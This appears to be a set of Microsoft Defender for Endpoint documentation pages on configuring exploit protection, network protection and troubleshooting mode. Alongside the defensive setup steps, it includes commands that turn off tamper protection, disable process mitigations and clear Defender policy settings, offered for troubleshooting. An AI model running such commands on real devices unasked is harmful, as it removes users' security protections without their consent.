- - **Off by default**: The mitigation is *disabled* for apps that don't have this mitigation set in the app-specific **Program settings** section
- - **Use default**: The mitigation is either enabled or disabled, depending on the default configuration that is set up by Windows 10 or Windows 11 installation; the default value (**On** or **Off**) is always specified next to the **Use default** label for each mitigation
-
-7. Repeat step 6 for all the system-level mitigations you want to configure. Select **Apply** when you're done setting up your configuration.
-
-If you add an app to the **Program settings** section and configure individual mitigation settings there, they'll be honored above the configuration for the same mitigations specified in the **System settings** section. The following matrix and examples help to illustrate how defaults work:
-
-|Enabled in **Program settings**|Enabled in **System settings**|Behavior|
-|:|:|:|
-|Yes|No|As defined in **Program settings**|
-|Yes|Yes|As defined in **Program settings**|
-|No|Yes|As defined in **System settings**|
-|No|No|Default as defined in **Use default** option|
-
-### Example 1: Mikael configures Data Execution Prevention in system settings section to be off by default
-
-Mikael adds the app *test.exe* to the **Program settings** section. In the options for that app, under **Data Execution Prevention (DEP)**, Mikael enables the **Override system settings** option and sets the switch to **On**. There are no other apps listed in the **Program settings** section.
-
-The result is that DEP is enabled only for *test.exe*. All other apps won't have DEP applied.
-
-### Example 2: Josie configures Data Execution Prevention in system settings to be off by default
-
-Josie adds the app *test.exe* to the **Program settings** section. In the options for that app, under **Data Execution Prevention (DEP)**, Josie enables the **Override system settings** option and sets the switch to **On**.
-
-Josie also adds the app *miles.exe* to the **Program settings** section and configures **Control flow guard (CFG)** to **On**. Josie doesn't enable the **Override system settings** option for DEP or any other mitigations for that app.
-
-The result is that DEP is enabled for *test.exe*. DEP won't be enabled for any other app, including *miles.exe*. CFG will be enabled for *miles.exe*.
-
-1. Open the Windows Security app by selecting the shield icon in the task bar or searching the start menu for **Windows Security**.
-
-2. Select the **App & browser control** tile (or the app icon on the left menu bar) and then select **Exploit protection**.
-
-3. Go to **Program settings** and choose the app you want to apply mitigations to.<br/>
- - If the app you want to configure is already listed, select it, and then select **Edit**.
- - If the app isn't listed, at the top of the list select **Add program to customize** and then choose how you want to add the app.<br/>
- - Use **Add by program name** to have the mitigation applied to any running process with that name. Specify a file with an extension. You can enter a full path to limit the mitigation to only the app with that name in that location.
- - Use **Choose exact file path** to use a standard Windows Explorer file picker window to find and select the file you want.
-
-4. After selecting the app, you'll see a list of all the mitigations that can be applied. Choosing **Audit** will apply the mitigation in audit mode only. You'll be notified if you need to restart the process or app, or if you need to restart Windows.
-
-5. Repeat steps 3-4 for all the apps and mitigations you want to configure. Select **Apply** when you're done setting up your configuration.
-
-## Intune
-
-1. Sign in to the [Azure portal](https://portal.azure.com) and open Intune.
-
-2. Go to **Device configuration** \> **Configuration Profiles** \> **Create profile**.
-
-3. Name the profile, choose **Windows 10 and later**, select **templates** for Profile type and choose **Endpoint protection** under template name.
-
- :::image type="content" source="media/create-endpoint-protection-profile.png" alt-text="The Create endpoint protection profile" lightbox="media/create-endpoint-protection-profile.png":::
-
-4. Select **Configure** \> **Windows Defender Exploit Guard** \> **Exploit protection**.
-
-5. Upload an [XML file](/windows/client-management/mdm/policy-csp-exploitguard) with the exploit protection settings:
-
- :::image type="content" source="media/enable-ep-intune.png" alt-text="The Enable network protection setting in Intune" lightbox="media/enable-ep-intune.png":::
-
-6. Select **OK** to save each open blade, and then choose **Create**.
-
-7. Select the profile **Assignments** tab, assign the policy to **All Users & All Devices**, and then select **Save**.
-
-## MDM
-
-Use the [./Vendor/MSFT/Policy/Config/ExploitGuard/ExploitProtectionSettings](/windows/client-management/mdm/policy-csp-exploitguard) configuration service provider (CSP) to enable or disable exploit protection mitigations or to use audit mode.
-
-## Microsoft Configuration Manager
-
-### Endpoint Security
-
-1. In Microsoft Configuration Manager, go to **Endpoint Security** \> **Attack surface reduction**.
-
-2. Select **Create Policy** \> **Platform**, and for **Profile**, choose **Exploit Protection**. Then select **Create**.
-
-3. Specify a name and a description, and then choose **Next**.
-
-4. Choose **Select XML File** and browse to the location of the exploit protection XML file. Select the file, and then choose **Next**.
-
-5. Configure **Scope tags** and **Assignments** if necessary.
-
-6. Under **Review + create**, review your configuration settings, and then choose **Create**.
-
-### Assets and Compliance
-
-1. In Microsoft Configuration Manager, go to **Assets and Compliance** \> **Endpoint Protection** \> **Windows Defender Exploit Guard**.
-
-2. Select **Home** \> **Create Exploit Guard Policy**.
-
-3. Specify a name and a description, select **Exploit protection**, and then choose **Next**.
-
-4. Browse to the location of the exploit protection XML file and select **Next**.
-
-5. Review the settings, and then choose **Next** to create the policy.
-
-6. After the policy is created, select **Close**.
-
-## Group Policy
-
-1. On your Group Policy management device, open the [Group Policy Management Console](/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc731212(v=ws.11)), right-click the Group Policy Object you want to configure and click **Edit**.
-
-2. In the **Group Policy Management Editor**, go to **Computer configuration** and select **Administrative templates**.
-
-3. Expand the tree to **Windows components** \> **Windows Defender Exploit Guard** \> **Exploit Protection** \> **Use a common set of exploit protection settings**.
-
-4. Select **Enabled** and type the location of the [XML file](/windows/client-management/mdm/policy-csp-exploitguard), and then choose **OK**.
-
-## PowerShell
-
-You can use the PowerShell verb `Get` or `Set` with the cmdlet `ProcessMitigation`. Using `Get` will list the current configuration status of any mitigations that have been enabled on the device - add the `-Name` cmdlet and app exe to see mitigations for just that app:
-
-```PowerShell
-Get-ProcessMitigation -Name processName.exe
-```
-
-> [!IMPORTANT]
-> System-level mitigations that have not been configured will show a status of `NOTSET`.
->
-> - For system-level settings, `NOTSET` indicates the default setting for that mitigation has been applied.
-> - For app-level settings, `NOTSET` indicates the system-level setting for the mitigation will be applied.
-> The default setting for each system-level mitigation can be seen in the Windows Security.
-
-Use `Set` to configure each mitigation in the following format:
-
-```PowerShell
-Set-ProcessMitigation -<scope> <app executable> -<action> <mitigation or options>,<mitigation or options>,<mitigation or options>
-```
-
-Where:
--- \<Scope\>:
- - `-Name` to indicate the mitigations should be applied to a specific app. Specify the app's executable after this flag.
- - `-System` to indicate the mitigation should be applied at the system level
-- \<Action\>:
- - `-Enable` to enable the mitigation
- - `-Disable` to disable the mitigation
-- \<Mitigation\>:
- - The mitigation's cmdlet along with any suboptions (surrounded with spaces). Each mitigation is separated with a comma.
-
-For example, to enable the Data Execution Prevention (DEP) mitigation with ATL thunk emulation and for an executable called *testing.exe* in the folder *C:\Apps\LOB\tests*, and to prevent that executable from creating child processes, you'd use the following command:
-
-```PowerShell
-Set-ProcessMitigation -Name c:\apps\lob\tests\testing.exe -Enable DEP, EmulateAtlThunks, DisallowChildProcessCreation
-```
-
-> [!IMPORTANT]
-> Separate each mitigation option with commas.
-
-If you wanted to apply DEP at the system level, you'd use the following command:
-
-```PowerShell
-Set-Processmitigation -System -Enable DEP
-```
-
-To disable mitigations, you can replace `-Enable` with `-Disable`. However, for app-level mitigations, this action forces the mitigation to be disabled only for that app.
-
-If you need to restore the mitigation back to the system default, you need to include the `-Remove` cmdlet as well, as in the following example:
-
-```PowerShell
-Set-Processmitigation -Name test.exe -Remove -Disable DEP
-```
-
-The following table lists the individual **Mitigations** (and **Audits**, when available) to be used with the `-Enable` or `-Disable` cmdlet parameters.<br/><br/>
-
-|Mitigation type|Applies to|Mitigation cmdlet parameter keyword|Audit mode cmdlet parameter|
-|||||
-|Control flow guard (CFG)|System and app-level|`CFG`, `StrictCFG`, `SuppressExports`|Audit not available|
-|Data Execution Prevention (DEP)|System and app-level|`DEP`, `EmulateAtlThunks`|Audit not available|
-|Force randomization for images (Mandatory ASLR)|System and app-level|`ForceRelocateImages`|Audit not available|
-|Randomize memory allocations (Bottom-Up ASLR)|System and app-level|`BottomUp`, `HighEntropy`|Audit not available
-|Validate exception chains (SEHOP)|System and app-level|`SEHOP`, `SEHOPTelemetry`|Audit not available|
-|Validate heap integrity|System and app-level|`TerminateOnError`|Audit not available|
-|Arbitrary code guard (ACG)|App-level only|`DynamicCode`|`AuditDynamicCode`|
-|Block low integrity images|App-level only|`BlockLowLabel`|`AuditImageLoad`|
-|Block remote images|App-level only|`BlockRemoteImages`|Audit not available|
-|Block untrusted fonts|App-level only|`DisableNonSystemFonts`|`AuditFont`, `FontAuditOnly`|
-|Code integrity guard|App-level only|`BlockNonMicrosoftSigned`, `AllowStoreSigned`|AuditMicrosoftSigned, AuditStoreSigned|
-|Disable extension points|App-level only|`ExtensionPoint`|Audit not available|
-|Disable Win32k system calls|App-level only|`DisableWin32kSystemCalls`|`AuditSystemCall`|
-|Don't allow child processes|App-level only|`DisallowChildProcessCreation`|`AuditChildProcess`|
-|Export address filtering (EAF)|App-level only|`EnableExportAddressFilterPlus`, `EnableExportAddressFilter` <a href="#r1" id="t1">\[1\]</a>|Audit not available <a href="#r2" id="t2">\[2\]</a>|
-|Import address filtering (IAF)|App-level only|`EnableImportAddressFilter`|Audit not available <a href="#r2" id="t2">\[2\]</a>|
-|Simulate execution (SimExec)|App-level only|`EnableRopSimExec`|Audit not available <a href="#r2" id="t2">\[2\]</a>|
-|Validate API invocation (CallerCheck)|App-level only|`EnableRopCallerCheck`|Audit not available <a href="#r2" id="t2">\[2\]</a>|
-|Validate handle usage|App-level only|`StrictHandle`|Audit not available|
-|Validate image dependency integrity|App-level only|`EnforceModuleDepencySigning`|Audit not available|
-|Validate stack integrity (StackPivot)|App-level only|`EnableRopStackPivot`|Audit not available <a href="#r2" id="t2">\[2\]</a>|
-
-<a href="#t1" id="r1">\[1\]</a>: Use the following format to enable EAF modules for DLLs for a process:
-
-```PowerShell
-Set-ProcessMitigation -Name processName.exe -Enable EnableExportAddressFilterPlus -EAFModules dllName1.dll,dllName2.dll
-```
-
-<a href="#t2" id="r2">\[2\]</a>: Audit for this mitigation isn't available via PowerShell cmdlets.
-
-## Customize the notification
-
-For information about customizing the notification when a rule is triggered and an app or file is blocked, see [Windows Security](/windows/security/threat-protection/windows-defender-security-center/windows-defender-security-center).
-
-## See also
--- [Evaluate exploit protection](evaluate-exploit-protection.md)-- [Configure and audit exploit protection mitigations](customize-exploit-protection.md)-- [Import, export, and deploy exploit protection configurations](import-export-exploit-protection-emet-xml.md)
security Enable Network Protection https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/enable-network-protection.md
- Title: Turn on network protection
-description: Enable network protection with Group Policy, PowerShell, or Mobile Device Management and Configuration Manager.
- Previously updated : 04/03/2024--------- m365-security-- tier2-- mde-asr--
-# Turn on network protection
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- Microsoft Defender Antivirus-
-**Platforms**
--- Windows-- Linux \(See [Network protection for Linux](network-protection-linux.md)\)-- macOS \(See [Network protection for macOS](network-protection-macos.md)\)-
-> [!TIP]
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-assignaccess-abovefoldlink)
-
-[Network protection](network-protection.md) helps to prevent employees from using any application to access dangerous domains that might host phishing scams, exploits, and other malicious content on the internet. You can [audit network protection](evaluate-network-protection.md) in a test environment to view which apps would be blocked before enabling network protection.
-
-[Learn more about network filtering configuration options.](/mem/intune/protect/endpoint-protection-windows-10#network-filtering)
-
-## Check if network protection is enabled
-
-Check to see if network protection is enabled on a local device by using Registry editor.
-
-1. Select the **Start** button in the task bar and type **regedit** to open Registry editor.
-
-2. Choose **HKEY_LOCAL_MACHINE** from the side menu.
-
-3. Navigate through the nested menus to **SOFTWARE** \> **Policies** \> **Microsoft** \> **Windows Defender** \> **Policy Manager**.
-
-If the Key is missing, Navigate to **SOFTWARE** \> **Microsoft** \> **Windows Defender** \> **Windows Defender Exploit Guard** \> **Network Protection**.
-
-4. Select **EnableNetworkProtection** to see the current state of network protection on the device:
-
- - 0, or **Off**
- - 1, or **On**
- - 2, or **Audit** mode
-
- :::image type="content" source="../../media/95341270-b738b280-08d3-11eb-84a0-16abb140c9fd.png" alt-text="Network Protection registry key" lightbox="../../media/95341270-b738b280-08d3-11eb-84a0-16abb140c9fd.png":::
-
-## Enable network protection
-
-Enable network protection by using any of these methods:
--- [PowerShell](#powershell)-- [Mobile Device Management (MDM)](#mobile-device-management-mdm)-- [Microsoft Intune](#microsoft-intune)-- [Group Policy](#group-policy)-- [Microsoft Configuration Manager](#microsoft-configuration-manager)-
-### PowerShell
-
-1. Type **powershell** in the Start menu, right-click **Windows PowerShell** and select **Run as administrator**.
-
-2. Enter the following cmdlet:
-
- ```PowerShell
- Set-MpPreference -EnableNetworkProtection Enabled
- ```
-
-3. Optional: Enable the feature in audit mode using the following cmdlet:
-
- ```PowerShell
- Set-MpPreference -EnableNetworkProtection AuditMode
- ```
-
- To turn off the feature, use `Disabled` instead of `AuditMode` or `Enabled`.
-
-### Mobile device management (MDM)
-
-Use the [./Vendor/MSFT/Policy/Config/Defender/EnableNetworkProtection](/windows/client-management/mdm/policy-csp-defender) configuration service provider (CSP) to enable or disable network protection or enable audit mode.
-
-[Update Microsoft Defender antimalware platform to the latest version](https://support.microsoft.com/topic/update-for-microsoft-defender-antimalware-platform-92e21611-8cf1-8e0e-56d6-561a07d144cc) before you enable or disable network protection or enable audit mode.
-
-### Microsoft Intune
-
-#### Microsoft Defender for Endpoint Baseline method
-
-1. Sign into the [Microsoft Intune admin center](https://endpoint.microsoft.com).
-
-2. Go to **Endpoint security** > **Security baselines** > **Microsoft Defender for Endpoint Baseline**.
-
-3. Select **Create a profile**, then provide a name for your profile, and then select **Next**.
-
-4. In the **Configuration settings** section, go to **Attack Surface Reduction Rules** > set **Block**, **Enable**, or **Audit** for **Enable network protection**. Select **Next**.
-
-5. Select the appropriate **Scope tags** and **Assignments** as required by your organization.
-
-7. Review all the information, and then select **Create**.
-
-#### Antivirus policy method
-
-1. Sign into the [Microsoft Intune admin center](https://endpoint.microsoft.com).
-
-2. Go to **Endpoint security** > **Antivirus**.
-
-3. Select **Create a policy**.
-
-4. In the **Create a policy** flyout, choose **Windows 10, Windows 11, and Windows Server** from the **Platform** list.
-
-5. Choose **Microsoft Defender Antivirus** from the **Profile** list then choose **Create**.
-
-6. Provide a name for your profile, and then select **Next**.
-
-7. In the **Configuration settings** section, select **Disabled**, **Enabled (block mode)** or **Enabled (audit mode)** for **Enable Network Protection**, then select **Next**.
-
-8. Select the appropriate **Assignments** and **Scope tags** as required by your organization.
-
-9. Review all the information, and then select **Create**.
-
-#### Configuration profile method
-
-1. Sign into the Microsoft Intune admin center (https://endpoint.microsoft.com).
-
-2. Go to **Devices** > **Configuration profiles** > **Create profile**.
-
-3. In the **Create a profile** flyout, select **Platform** and choose the **Profile Type** as **Templates**.
-
-4. In the **Template name**, Choose **Endpoint protection** from the list of templates, and then select **Create**.
-
-4. Go to **Endpoint protection** > **Basics**, provide a name for your profile, and then select **Next**.
-
-5. In the **Configuration settings** section, go to **Microsoft Defender Exploit Guard** > **Network filtering** > **Network protection** > **Enable** or **Audit**. Select **Next**.
-
-6. Select the appropriate **Scope tags**, **Assignments**, and **Applicability rules** as required by your organization. Admins can set more requirements.
-
-7. Review all the information, and then select **Create**.
-
-### Group Policy
-
-Use the following procedure to enable network protection on domain-joined computers or on a standalone computer.
-
-1. On a standalone computer, go to **Start** and then type and select **Edit group policy**.
-
- *-Or-*
-
- On a domain-joined Group Policy management computer, open the [Group Policy Management Console](https://technet.microsoft.com/library/cc731212.aspx), right-click the Group Policy Object you want to configure and select **Edit**.
-
-2. In the **Group Policy Management Editor**, go to **Computer configuration** and select **Administrative templates**.
-
-3. Expand the tree to **Windows components** \> **Microsoft Defender Antivirus** \> **Microsoft Defender Exploit Guard** \> **Network protection**.
-
- > [!NOTE]
- > On older versions of Windows, the group policy path may say "Windows Defender Antivirus" instead of "Microsoft Defender Antivirus."
-
-4. Double-click the **Prevent users and apps from accessing dangerous websites** setting and set the option to **Enabled**. In the options section, you must specify one of the following options:
-
- - **Block** - Users can't access malicious IP addresses and domains.
- - **Disable (Default)** - The Network protection feature won't work. Users aren't blocked from accessing malicious domains.
- - **Audit Mode** - If a user visits a malicious IP address or domain, an event will be recorded in the Windows event log. However, the user won't be blocked from visiting the address.
-
- > [!IMPORTANT]
- > To fully enable network protection, you must set the Group Policy option to **Enabled** and also select **Block** in the options drop-down menu.
-
- > [!NOTE]
- > Optional: Follow the steps in [Check if network protection is enabled](#check-if-network-protection-is-enabled) to verify that your Group Policy settings are correct.
-
-### Microsoft Configuration Manager
-
-1. Open the Configuration Manager console.
-
-2. Go to **Assets and Compliance** > **Endpoint Protection** > **Windows Defender Exploit Guard**.
-
-3. Select **Create Exploit Guard Policy** from the ribbon to create a new policy.
- - To edit an existing policy, select the policy, then select **Properties** from either the ribbon or the right-click menu. Edit the **Configure network protection** option from the **Network Protection** tab.
-
-4. On the **General** page, specify a name for the new policy and verify the **Network protection** option is enabled.
-
-5. On the **Network protection** page, select one of the following settings for the **Configure network protection** option:
-
- - **Block**
- - **Audit**
- - **Disabled**
-
-6. Complete the rest of the steps, and save the policy.
-
-7. From the ribbon, select **Deploy** to deploy the policy to a collection.
-
-> [!IMPORTANT]
-> Once you deploy an Exploit Guard policy from Configuration Manager, the Exploit Guard settings will not be removed from the clients if you remove the deployment. `Delete not supported` is recorded in the Configuration Manager client's ExploitGuardHandler.log if you remove the client's Exploit Guard deployment. <!--CMADO8538577-->
-> The following PowerShell script can be run under SYSTEM context to remove these settings:<!--CMADO9907132-->
->
-> ```powershell
-> $defenderObject = Get-WmiObject -Namespace "root/cimv2/mdm/dmmap" -Class "MDM_Policy_Config01_Defender02" -Filter "InstanceID='Defender' and ParentID='./Vendor/MSFT/Policy/Config'"
-> $defenderObject.AttackSurfaceReductionRules = $null
-> $defenderObject.AttackSurfaceReductionOnlyExclusions = $null
-> $defenderObject.EnableControlledFolderAccess = $null
-> $defenderObject.ControlledFolderAccessAllowedApplications = $null
-> $defenderObject.ControlledFolderAccessProtectedFolders = $null
-> $defenderObject.EnableNetworkProtection = $null
-> $defenderObject.Put()
->
-> $exploitGuardObject = Get-WmiObject -Namespace "root/cimv2/mdm/dmmap" -Class "MDM_Policy_Config01_ExploitGuard02" -Filter "InstanceID='ExploitGuard' and ParentID='./Vendor/MSFT/Policy/Config'"
-> $exploitGuardObject.ExploitProtectionSettings = $null
-> $exploitGuardObject.Put()
->```
-
-## See also
--- [Network protection](network-protection.md)--- [Network protection for Linux](network-protection-linux.md)--- [Network protection for macOS](network-protection-macos.md)--- [Network protection and the TCP three-way handshake](network-protection.md#network-protection-and-the-tcp-three-way-handshake)--- [Evaluate network protection](evaluate-network-protection.md)--- [Troubleshoot network protection](troubleshoot-np.md)--
security Enable Troubleshooting Mode https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/enable-troubleshooting-mode.md
- Title: Get started with troubleshooting mode in Microsoft Defender for Endpoint
-description: Turn on the Microsoft Defender for Endpoint troubleshooting mode to address various antivirus issues.
-------- m365-security-- tier2-- mde-ngp-- Previously updated : 09/25/2023--
-# Get started with troubleshooting mode in Microsoft Defender for Endpoint
-
-**Applies to:**
--- [Microsoft Defender for Endpoint](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://www.microsoft.com/WindowsForBusiness/windows-atp?ocid=docs-wdatp-configureendpointsscript-abovefoldlink)
-
-Troubleshooting mode in Microsoft Defender for Endpoint enables admins to troubleshoot various Microsoft Defender Antivirus features, even if devices are managed by organizational policies. For example, if [tamper protection](prevent-changes-to-security-settings-with-tamper-protection.md) is enabled, [certain settings](prevent-changes-to-security-settings-with-tamper-protection.md#what-happens-when-tamper-protection-is-turned-on) can't be modified or turned off, but you can use troubleshooting mode on a device to edit those settings temporarily.
-
-Troubleshooting mode is disabled by default, and requires you to turn it on for a device (and/or group of devices) for a limited time. Troubleshooting mode is exclusively an enterprise-only feature, and requires Microsoft Defender portal access.
-
-> [!TIP]
-> - During troubleshooting mode, you can use the PowerShell command `Set-MPPreference -DisableTamperProtection $true` on Windows devices.
-> - To check the state of [tamper protection](prevent-changes-to-security-settings-with-tamper-protection.md), you can use the [Get-MpComputerStatus](/powershell/module/defender/get-mpcomputerstatus) PowerShell cmdlet. In the list of results, look for `IsTamperProtected` or `RealTimeProtectionEnabled`. (A value of *true* means tamper protection is enabled.)
-.
-## What do you need to know before you begin?
-
-During troubleshooting mode, you can use the PowerShell command `Set-MPPreference -DisableTamperProtection $true` or, on client operating systems, the Security Center app to temporarily disable tamper protection on your device and make your necessary configuration changes.
--- Use troubleshooting mode to disable/change the tamper protection setting to perform:-
- - Microsoft Defender Antivirus functional troubleshooting /application compatibility (false positive application blocks).
--- Local admins, with appropriate permissions, can change configurations on individual endpoints that are usually locked by policy. Having a device in troubleshooting mode can be helpful when diagnosing Microsoft Defender Antivirus performance and compatibility scenarios.-
- - Local admins can't turn off Microsoft Defender Antivirus, or uninstall it.
-
- - Local admins can configure all other security settings in the Microsoft Defender Antivirus suite (for example, cloud protection, tamper protection).
--- Admins with "Manage Security settings" permissions have access to turn on troubleshooting mode.--- Microsoft Defender for Endpoint collects logs and investigation data throughout the troubleshooting process.-
- - A snapshot of `MpPreference` is taken before troubleshooting mode begins.
-
- - A second snapshot is taken just before troubleshooting mode expires.
-
- - Operational logs from during troubleshooting mode are also collected.
-
- - Logs and snapshots are collected and are available for an admin to collect using the [Collect investigation package](respond-machine-alerts.md#collect-investigation-package-from-devices) feature on the device page. Microsoft doesn't remove this data from the device until an admin has collected it.
--- Admins can also review the changes in settings that take place during Troubleshooting mode in **Event Viewer** on the device page.--- Troubleshooting mode automatically turns off after reaching the expiration time (it lasts for 4 hours). After expiration, all policy-managed configurations become read-only again and revert back to how the device was configured before enabling troubleshooting mode.--- It could take up to 15 minutes from the time the command is sent from Microsoft Defender XDR to when it becomes active on the device.--- Notifications are sent to the user when troubleshooting mode begins and when troubleshooting mode ends. A warning is also sent to indicate that troubleshooting mode is ending soon.--- The beginning and ending of troubleshooting mode is identified in the **Device Timeline** on the device page.--- You can query all troubleshooting mode events in advanced hunting.-
-> [!NOTE]
-> Policy management changes are applied to the device when it is actively in troubleshooting mode. However, the changes do not take effect until troubleshooting mode expires. Additionally, Microsoft Defender Antivirus Platform updates are not applied during Troubleshooting mode. Platform updates are applied when troubleshooting mode ends with a Windows update.
-
-## Prerequisites
--- A device running Windows 10 (version 19044.1618 or later), Windows 11, Windows Server 2019, or Windows Server 2022.-
- Semester/Redstone|OS version|Release
- :|:|:
- 21H2/SV1|>=22000.593|[KB5011563: Microsoft Update Catalog](https://www.catalog.update.microsoft.com/Search.aspx?q=KB5019275)
- 20H1/20H2/21H1|>=19042.1620<br/> >=19041.1620<br/> >=19043.1620|[KB5011543: Microsoft Update Catalog](https://www.catalog.update.microsoft.com/Search.aspx?q=KB5011543)
- Windows Server 2022|>=20348.617|[KB5011558: Microsoft Update Catalog](https://www.catalog.update.microsoft.com/Search.aspx?q=KB5011558)
- Windows Server 2019 (RS5)|>=17763.2746|[KB5011551: Microsoft Update Catalog](https://www.catalog.update.microsoft.com/Search.aspx?q=KB5011551)
--- Troubleshooting mode is also available for machines running the modern, unified solution for Windows Server 2012 R2 and Windows Server 2016. Before you use troubleshooting mode, make sure all of the following components are up to date:-
- - Sense version `10.8049.22439.1084` or later ([KB5005292: Microsoft Update Catalog](https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005292))
-
- - Microsoft Defender Antivirus - Platform: `4.18.2207.7` or later ([KB4052623: Microsoft Update Catalog](https://www.catalog.update.microsoft.com/Search.aspx?q=KB4052623))
-
- - Microsoft Defender Antivirus - Engine: `1.1.19500.2` or later ([KB2267602: Microsoft Update Catalog](https://www.microsoft.com/en-us/wdsi/defenderupdates))
--- For troubleshooting mode to be applied, Microsoft Defender for Endpoint must be tenant-enrolled and active on the device.--- The device must be actively running Microsoft Defender Antivirus, version 4.18.2203 or later.-
-## Enable troubleshooting mode
-
-1. Go to the Microsoft Defender portal (<https://security.microsoft.com>), and sign in.
-
-2. Navigate to the device page/machine page for the device you would like to turn on troubleshooting mode. Select **Turn on troubleshooting mode**. You must have "Manage security settings in Security Center" [permissions](assign-portal-access.md) for Microsoft Defender for Endpoint.
-
- :::image type="content" source="../../media/ts-mode-menu.png" alt-text="Turn on troubleshooting mode" lightbox="../../media/ts-mode-menu.png":::
-
-> [!NOTE]
-> The **Turn on troubleshooting mode** option is available on all devices, even if the device does not meet the prerequisites for troubleshooting mode.
-
-3. Confirm you want to turn on troubleshooting mode for the device.
-
- :::image type="content" source="../../media/ts-mode-conf-flyout.png" alt-text="The configuration flyout" lightbox="../../media/ts-mode-conf-flyout.png":::
-
-4. The device page shows the device is now in troubleshooting mode.
-
- :::image type="content" source="../../media/ts-mode-option-greyed-out.png" alt-text="The device is now in troubleshooting mode" lightbox="../../media/ts-mode-option-greyed-out.png":::
-
-## Advanced hunting queries
-
-Here are some prebuilt advanced hunting queries to give you visibility into the troubleshooting events that are occurring in your environment. You can also use these queries to [create detection rules](../defender/custom-detection-rules.md#create-a-custom-detection-rule) to generate alerts when devices are in troubleshooting mode.
-
-### Get troubleshooting events for a particular device
-
-Search by deviceId or deviceName by commenting out the respective lines.
-
-```kusto
-//let deviceName = "<deviceName>"; // update with device name
-let deviceId = "<deviceID>"; // update with device id
-DeviceEvents
-| where DeviceId == deviceId
-//| where DeviceName == deviceName
-| where ActionType == "AntivirusTroubleshootModeEvent"
-| extend _tsmodeproperties = parse_json(AdditionalFields)
-| project Timestamp,DeviceId, DeviceName, _tsmodeproperties,
- _tsmodeproperties.TroubleshootingState, _tsmodeproperties.TroubleshootingPreviousState, _tsmodeproperties.TroubleshootingStartTime,
- _tsmodeproperties.TroubleshootingStateExpiry, _tsmodeproperties.TroubleshootingStateRemainingMinutes,
- _tsmodeproperties.TroubleshootingStateChangeReason, _tsmodeproperties.TroubleshootingStateChangeSource
-```
-
-### Devices currently in troubleshooting mode
-
-```kusto
-DeviceEvents
-| where Timestamp > ago(3h) // troubleshooting mode automatically disables after 4 hours
-| where ActionType == "AntivirusTroubleshootModeEvent"
-| extend _tsmodeproperties = parse_json(AdditionalFields)
-| where _tsmodeproperties.TroubleshootingStateChangeReason contains "started"
-|summarize (Timestamp, ReportId)=arg_max(Timestamp, ReportId), count() by DeviceId
-| order by Timestamp desc
-```
-
-### Count of troubleshooting mode instances by device
-
-```kusto
-DeviceEvents
-| where ActionType == "AntivirusTroubleshootModeEvent"
-| extend _tsmodeproperties = parse_json(AdditionalFields)
-| where Timestamp > ago(30d) // choose the date range you want
-| where _tsmodeproperties.TroubleshootingStateChangeReason contains "started"
-| summarize (Timestamp, ReportId)=arg_max(Timestamp, ReportId), count() by DeviceId
-| sort by count_
-```
-
-### Total count
-
-```kusto
-DeviceEvents
-| where ActionType == "AntivirusTroubleshootModeEvent"
-| extend _tsmodeproperties = parse_json(AdditionalFields)
-| where Timestamp > ago(2d) //beginning of time range
-| where Timestamp < ago(1d) //end of time range
-| where _tsmodeproperties.TroubleshootingStateChangeReason contains "started"
-| summarize (Timestamp, ReportId)=arg_max(Timestamp, ReportId), count()
-| where count_ > 5 // choose your max # of TS mode instances for your time range
-```
-
-## Related articles
-
-> [!TIP]
-> **Performance tip** Due to a variety of factors, Microsoft Defender Antivirus, like other antivirus software, can cause performance issues on endpoint devices. In some cases, you might need to tune the performance of Microsoft Defender Antivirus to alleviate those performance issues. Microsoft's **Performance analyzer** is a PowerShell command-line tool that helps determine which files, file paths, processes, and file extensions might be causing performance issues; some examples are:
->
-> - Top paths that impact scan time
-> - Top files that impact scan time
-> - Top processes that impact scan time
-> - Top file extensions that impact scan time
-> - Combinations ΓÇô for example:
-> - top files per extension
-> - top paths per extension
-> - top processes per path
-> - top scans per file
-> - top scans per file per process
->
-> You can use the information gathered using Performance analyzer to better assess performance issues and apply remediation actions.
-> See: [Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md).
->
--- [Troubleshooting mode scenarios](troubleshooting-mode-scenarios.md)-- [Protect security settings with tamper protection](prevent-changes-to-security-settings-with-tamper-protection.md)
security Enable Update Mdav To Latest Ws https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/enable-update-mdav-to-latest-ws.md
- Title: Enable and update Microsoft Defender Antivirus on Windows Server
-description: Learn how to enable and update Microsoft Defender Antivirus on Windows Server
--- Previously updated : 01/31/2024---- m365-security-- tier2-- mde-ngp-----
-# Enable and update Defender Antivirus to the latest version on Windows Server
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-If you wish to use Microsoft Defender Antivirus on your Windows Server, and it had been previously disabled or uninstalled, you may need to take further steps to re-enable it and ensure it's fully updated.
-
-To enable and update Microsoft Defender Antivirus on Windows Server, perform the following steps:
-
-1. Install the latest Servicing Stack Update (SSU).
-2. Install the latest cumulative update (LCU).
